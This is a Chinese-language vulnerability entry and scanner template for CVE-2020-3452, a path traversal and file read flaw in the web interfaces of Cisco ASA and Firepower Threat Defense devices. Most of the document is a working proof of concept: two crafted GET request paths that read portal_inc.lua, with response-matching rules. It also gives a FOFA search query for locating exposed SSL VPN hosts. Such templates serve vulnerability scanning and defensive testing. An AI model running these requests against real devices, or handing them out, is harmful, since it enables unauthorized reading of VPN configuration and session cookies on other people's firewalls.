漏洞描述
防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。
攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。
fofa: title="SSL VPN Service"
CVE-2020-3452: Cisco Read-Only Path Traversal
PoC代码[已公开]
id: CVE-2020-3452
info:
name: Cisco Read-Only Path Traversal
author: 不动明王
severity: high
verified: true
description: |
防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。
攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。
fofa: title="SSL VPN Service"
reference:
- https://zhuanlan.zhihu.com/p/163246632
- https://nvd.nist.gov/vuln/detail/CVE-2020-3452
tags: cve,cve2020,cisco,traversal,readfile
created: 2023/08/17
rules:
r0:
request:
method: GET
path: /%2bCSCOT%2b/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
expression: response.status == 200 && response.headers["content-type"].contains("application/octet-stream") && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED")
r1:
request:
method: GET
path: /%2bCSCOT%2b/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
expression: response.status == 200 && response.headers["content-type"].contains("application/octet-stream") && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED")
expression: r0() || r1()